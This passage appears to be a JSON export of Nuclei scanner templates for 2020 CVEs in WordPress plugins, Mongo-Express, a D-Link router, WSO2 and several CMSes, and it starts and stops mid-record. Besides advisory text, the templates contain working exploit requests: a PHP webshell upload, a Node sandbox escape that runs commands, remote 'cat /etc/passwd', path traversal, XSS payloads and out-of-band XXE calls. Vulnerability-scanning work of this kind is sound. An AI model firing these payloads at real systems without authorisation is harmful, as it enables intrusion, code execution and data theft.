HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Import XML feed'\n\n - raw:\n - |\n POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1\n Host: {{Hostname}}\n Content-Type: 
application/x-www-form-urlencoded\n\n type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a004730450221008907b33fa8964132104119ef61c647b4ac492fb6758e4d425a2e2e06c366b968022006bc6c08457da183de8a277b67987bfcd2c316abba26adfeb9d24a31aed2b689:922c64590222798bb761d5b6d8e72950", "hash": "6620a1a5bc16368a6fd1ea6f8e697936", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ce" }, "name": "CVE-2020-24186.yaml", "content": "id: CVE-2020-24186\n\ninfo:\n name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution\n author: Ganofins\n severity: critical\n description: WordPress wpDiscuz plugin versions 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gives unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.\n impact: |\n Successful exploitation of this vulnerability can lead to arbitrary code execution on the affected WordPress site.\n remediation: |\n Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability.\n reference:\n - https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24186\n - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/\n - http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2020-24186\n cwe-id: CWE-434\n epss-score: 0.97448\n epss-percentile: 0.99947\n cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: gvectors\n product: wpdiscuz\n framework: 
wordpress\n tags: cve,cve2020,rce,fileupload,packetstorm,wordpress,wp-plugin,intrusive,gvectors\n\nhttp:\n - raw:\n - |\n GET /?p=1 HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n X-Requested-With: XMLHttpRequest\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}\n\n ------WebKitFormBoundary88AhjLimsDMHU1Ak\n Content-Disposition: form-data; name=\"action\"\n\n wmuUploadFiles\n ------WebKitFormBoundary88AhjLimsDMHU1Ak\n Content-Disposition: form-data; name=\"wmu_nonce\"\n\n {{wmuSecurity}}\n ------WebKitFormBoundary88AhjLimsDMHU1Ak\n Content-Disposition: form-data; name=\"wmuAttachmentsData\"\n\n undefined\n ------WebKitFormBoundary88AhjLimsDMHU1Ak\n Content-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\n Content-Type: image/png\n\n {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n \n ------WebKitFormBoundary88AhjLimsDMHU1Ak\n Content-Disposition: form-data; name=\"postId\"\n\n 1\n ------WebKitFormBoundary88AhjLimsDMHU1Ak--\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'success\":true'\n - 'fullname'\n - 'shortname'\n - 'url'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: wmuSecurity\n group: 1\n regex:\n - 'wmuSecurity\":\"([a-z0-9]+)'\n internal: true\n part: body\n\n - type: regex\n group: 1\n regex:\n - '\"url\":\"([a-z:\\\\/0-9-.]+)\"'\n part: body\n# digest: 4b0a00483046022100e38932a4bbaeb966d0ff133b826f339af5d5ced828fa938d65afd4ca069940b602210086ec11b8bf600caea0125a35dd2eab8c0843a0335c30b73c7a29838c73c03bca:922c64590222798bb761d5b6d8e72950", "hash": "acb80dc46edcce2c146449ed564626eb", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081cf" }, "name": "CVE-2020-24223.yaml", "content": "id: CVE-2020-24223\n\ninfo:\n 
name: Mara CMS 7.5 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/48777\n - https://sourceforge.net/projects/maracms/\n - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24223\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24223\n cwe-id: CWE-79\n epss-score: 0.0069\n epss-percentile: 0.79693\n cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mara_cms_project\n product: mara_cms\n tags: cve2020,cve,mara,xss,edb,mara_cms_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c184f6cf7e4218d7dc019d2c5ea69521956dec299e26d63e7d225fdfa6ff333202206a684eb7713168bde079f4ecbe55ba8abfc7056a40ec4a4306788f69e880bb70:922c64590222798bb761d5b6d8e72950", "hash": "6fa7f550c44e8d61ed1e575e98b91970", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d0" }, "name": "CVE-2020-24312.yaml", "content": "id: CVE-2020-24312\n\ninfo:\n name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure\n 
author: x1m_martijn\n severity: high\n description: |\n mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive information, such as database backups, configuration files, and other sensitive data.\n remediation: |\n Update the WordPress Plugin File Manager (wp-file-manager) to the latest version to mitigate the backup disclosure vulnerability.\n reference:\n - https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24312\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-24312\n cwe-id: CWE-552\n epss-score: 0.02041\n epss-percentile: 0.87791\n cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: webdesi9\n product: file_manager\n framework: wordpress\n tags: cve,cve2020,wordpress,backups,plugin,webdesi9\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Index of'\n - 'wp-content/uploads/wp-file-manager-pro/fm_backup'\n - 'backup_'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220457039ce0d9472c9c7f31b2390ffa8f660ae48086aaac7e0cbc18f819873abc502206ba999750bee55d9e2bf5bda1c630a0706596ba612b1c1c330e5e33e913b46ae:922c64590222798bb761d5b6d8e72950", "hash": "661b9903b0e39442875126309e9400a2", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d1" }, 
"name": "CVE-2020-24391.yaml", "content": "id: CVE-2020-24391\n\ninfo:\n name: Mongo-Express - Remote Code Execution\n author: leovalcante\n severity: critical\n description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user-supplied JavaScript. The safer-eval sandbox is easily escaped, leading to remote code execution in the context of the Node server process.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Mongo-Express to version 1.0.0 or later, which contains the fix in the commit referenced below.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/\n - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24391\n - https://github.com/mongodb-js/query-parser/issues/16\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-24391\n epss-score: 0.55667\n epss-percentile: 0.97606\n cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 3\n vendor: mongo-express_project\n product: mongo-express\n framework: node.js\n tags: cve,cve2020,mongo,express,rce,intrusive,mongo-express_project,node.js\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /checkValid HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n - |\n GET /public/css/{{randstr}}.css HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body_3\n regex:\n - \"((u|g)id|groups)=[0-9]{1,4}\\\\([a-z0-9]+\\\\)\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - \"((u|g)id|groups)=[0-9]{1,4}\\\\([a-z0-9]+\\\\)\"\n# digest: 4a0a0047304502200b7220be48731b335cab21f60260aa54175107f3ff242575a13060dbca77c791022100ef30764fd9c95d17d3e63194c798c924ddbff9e0b7835808965f3d535a3b783e:922c64590222798bb761d5b6d8e72950", "hash": "b44d1a533943acf396476dcc745159cd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d2" }, "name": "CVE-2020-24550.yaml", "content": "id: CVE-2020-24550\n\ninfo:\n name: EpiServer Find <13.2.7 - Open Redirect\n author: dhiyaneshDK\n severity: medium\n description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. 
An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Upgrade to EpiServer Find version 13.2.7 or later to fix the open redirect vulnerability.\n reference:\n - https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24550\n - https://github.com/anonymous364872/Rapier_Tool\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24550\n cwe-id: CWE-601\n epss-score: 0.00144\n epss-percentile: 0.5018\n cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: episerver\n product: find\n tags: cve,cve2020,redirect,episerver\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Location: https://interact.sh\"\n\n - type: status\n status:\n - 301\n# digest: 4a0a00473045022018163727234213b861bfb8914b4d77409e691a7f6f9c7c2465b22354950083a50221008f19141194cbd2b54e09312bac9028670397764fb51b86114e0e9e4397c56f03:922c64590222798bb761d5b6d8e72950", "hash": "acb55f339ae068a0c1d0af49c6fa21a5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d3" }, "name": "CVE-2020-24571.yaml", "content": "id: CVE-2020-24571\n\ninfo:\n name: NexusDB <4.50.23 - Local File Inclusion\n author: pikpikcu\n severity: high\n description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to access sensitive 
information, such as configuration files, credentials, or other sensitive data.\n remediation: |\n Upgrade NexusDB to version 4.50.23 or later to mitigate the LFI vulnerability.\n reference:\n - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24571\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/HimmelAward/Goby_POC\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-24571\n cwe-id: CWE-22\n epss-score: 0.09103\n epss-percentile: 0.94485\n cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nexusdb\n product: nexusdb\n tags: cve,cve2020,nexusdb,lfi\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/../../../../../../../../windows/win.ini'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"[extensions]\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202298bb27c5eb5c4f9e4d9d31587ae706b8a807aa6962d3f2aae7019a33cf57ff022023b31f5d74718b2e0d0f3c1b321a5b321ab310304a433831ceb1144c469611d0:922c64590222798bb761d5b6d8e72950", "hash": "bfbb167d9bffaf1e1dba33b29fe2bee4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d4" }, "name": "CVE-2020-24579.yaml", "content": "id: CVE-2020-24579\n\ninfo:\n name: D-Link DSL 2888a - Authentication Bypass/Remote Command Execution\n author: pikpikcu\n severity: high\n description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. 
An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary commands on the affected router.\n remediation: |\n Update the DSL-2888A to firmware AU_2.31_V1.1.47ae55 or later, as provided by D-Link, to fix the vulnerability.\n reference:\n - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24579\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-24579\n cwe-id: CWE-287\n epss-score: 0.04563\n epss-percentile: 0.9232\n cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: dlink\n product: dsl2888a_firmware\n tags: cve,cve2020,dlink,rce\n\nhttp:\n - raw:\n - | # Response:Location: /page/login/login_fail.html\n POST / HTTP/1.1\n Host: {{Hostname}}\n Cookie: uid=6gPjT2ipmNz\n\n username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n - | # Get /etc/passwd\n GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\n Host: {{Hostname}}\n Cookie: uid=6gPjT2ipmNz\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"nobody:[x*]:65534:65534\"\n - \"root:.*:0:0:\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220066bfa74b2f1b728ce53f16ab6639e0ff98246333be3a0ad3fe83f7c64c33bb6022100eaac438fe3d62f74001b2af20f8088179ba40ea0e089b87468ccea9a4689a3d7:922c64590222798bb761d5b6d8e72950", "hash": "c30913ce4a8f50928c22eece00fe61a8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d5" }, "name": 
"CVE-2020-24589.yaml", "content": "id: CVE-2020-24589\n\ninfo:\n name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection\n author: lethargynavigator\n severity: critical\n description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery.\n remediation: |\n Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch.\n reference:\n - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24589\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/athiththan11/WSO2-CVE-Extractor\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\n cvss-score: 9.1\n cve-id: CVE-2020-24589\n cwe-id: CWE-611\n epss-score: 0.65955\n epss-percentile: 0.97835\n cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wso2\n product: api_manager\n tags: cve2020,cve,wso2,xxe,oast,blind\n\nhttp:\n - raw:\n - |\n POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n payload=<%3fxml+version%3d\"1.0\"+%3f>%25xxe%3b]>\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"Failed to install the generic artifact type\"\n# digest: 
4b0a0048304602210090a4585860b08882e0a74df9f647083b80f77dac5ad0dd1b23edda572fabe9f7022100bd4d26f2655c26e67675437452a7565ec16e27eaeb99d4cd108cc9101d9dfc3c:922c64590222798bb761d5b6d8e72950", "hash": "32acc7dfea537582af27b670f10cab6d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d6" }, "name": "CVE-2020-24701.yaml", "content": "id: CVE-2020-24701\n\ninfo:\n name: OX Appsuite - Cross-Site Scripting\n author: DhiyaneshDk\n severity: medium\n description: |\n OX App Suite through 7.10.4 allows XSS via the app loading mechanism (the PATH_INFO to the /appsuite URI).\n reference:\n - https://packetstormsecurity.com/files/163527/OX-App-Suite-OX-Guard-OX-Documents-SSRF-Cross-Site-Scripting.html\n - https://seclists.org/fulldisclosure/2021/Jul/33\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24701\n - https://www.open-xchange.com\n - https://github.com/20142995/sectool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24701\n cwe-id: CWE-79\n epss-score: 0.00818\n epss-percentile: 0.81463\n cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: open-xchange\n product: open-xchange_appsuite\n shodan-query: html:\"Appsuite\"\n tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss='\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Request with action all'\n - ''\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a2cdebb20e18eaa890cfc50613c3066fe88508ab4895439e1e93c3be8538e21e0221009989389686769e0e936f56b8d0c418beb0c14d427c1d13f1eb05dbd4f49ffacc:922c64590222798bb761d5b6d8e72950", "hash": "8bb8f59abd64e57f57f7be6b96c30370", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { 
"$oid": "66477a413521042ccf3081d7" }, "name": "CVE-2020-24902.yaml", "content": "id: CVE-2020-24902\n\ninfo:\n name: Quixplorer <=2.4.1 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of Quixplorer (>=2.4.2) or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24902\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24902\n cwe-id: CWE-79\n epss-score: 0.00195\n epss-percentile: 0.56453\n cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: quixplorer_project\n product: quixplorer\n shodan-query: http.title:\"My Download Server\"\n google-query: intitle:\"My Download Server\"\n tags: cve,cve2020,quixplorer,xss,quixplorer_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"&srt=yes\"\n - \"My Download\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n 
status:\n - 200\n# digest: 4a0a00473045022100cc3315a626f72938e1bbd0b8d6123c0a4e45d1f6f608ec22fc41d9b038f25b6d022045f6709f3c37e878675f5ea3caf6f393801ac2d1c850932a039abd8066a934a6:922c64590222798bb761d5b6d8e72950", "hash": "aba20b0c26ad95805784e134d2f49708", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d8" }, "name": "CVE-2020-24903.yaml", "content": "id: CVE-2020-24903\n\ninfo:\n name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks.\n reference:\n - https://seclists.org/bugtraq/2016/Mar/104\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24903\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24903\n cwe-id: CWE-79\n epss-score: 0.00269\n epss-percentile: 0.67095\n cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cutesoft\n product: cute_editor\n framework: asp.net\n shodan-query: http.component:\"ASP.NET\"\n tags: cve,cve2020,cuteeditor,xss,seclists,cutesoft,asp.net\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";>'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"

    \"\n - \"System.Web\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008dc31b494c720948586f64df0d6c82addb71bac56f1d7b99d5b94d7c7d698c20022100fdc628af73a6fc813bb7c98900e81ba79c49b4eeafc5fe53895b55f7c2cfb055:922c64590222798bb761d5b6d8e72950", "hash": "57792902c244abcb4771ff05ba3da623", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081d9" }, "name": "CVE-2020-24912.yaml", "content": "id: CVE-2020-24912\n\ninfo:\n name: QCubed - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: A reflected cross-site scripting vulnerability in QCubed (all versions including 3.1.1) in profile.php via the stQuery parameter allows unauthenticated attackers to steal the sessions of authenticated users.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a QCubed release that includes the fix from pull request qcubed/qcubed#1320 (referenced below) to mitigate this vulnerability.\n reference:\n - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03\n - https://github.com/qcubed/qcubed/pull/1320/files\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24912\n - http://seclists.org/fulldisclosure/2021/Mar/30\n - http://qcubed.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-24912\n cwe-id: CWE-79\n epss-score: 0.00346\n epss-percentile: 0.7108\n cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: qcubed\n product: qcubed\n tags: cve2020,cve,qcubed,xss,seclists\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/assets/_core/php/profile.php\"\n - \"{{BaseURL}}/assets/php/profile.php\"\n - \"{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php\"\n\n body: 
\"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=\"\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - 'Content-Type: text/html'\n# digest: 4a0a00473045022100a91523e9be74d0fdb90d90a1c3d215030746d376affcf30c8322918bde098fce0220595f4f0288fb85dad8ad6bc73fc2da9fb28c78ed25c2efe66c9d8fdafef1f1a0:922c64590222798bb761d5b6d8e72950", "hash": "4b290db537f50f9c79663c2b4b093d23", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081da" }, "name": "CVE-2020-24949.yaml", "content": "id: CVE-2020-24949\n\ninfo:\n name: PHP-Fusion 9.03.50 - Remote Code Execution\n author: geeknik\n severity: high\n description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system, potentially leading to full compromise.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of PHP-Fusion.\n reference:\n - https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt\n - https://github.com/php-fusion/PHP-Fusion/issues/2312\n - http://packetstormsecurity.com/files/162852/PHPFusion-9.03.50-Remote-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-24949\n - https://github.com/404notf0und/CVE-Flow\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-24949\n 
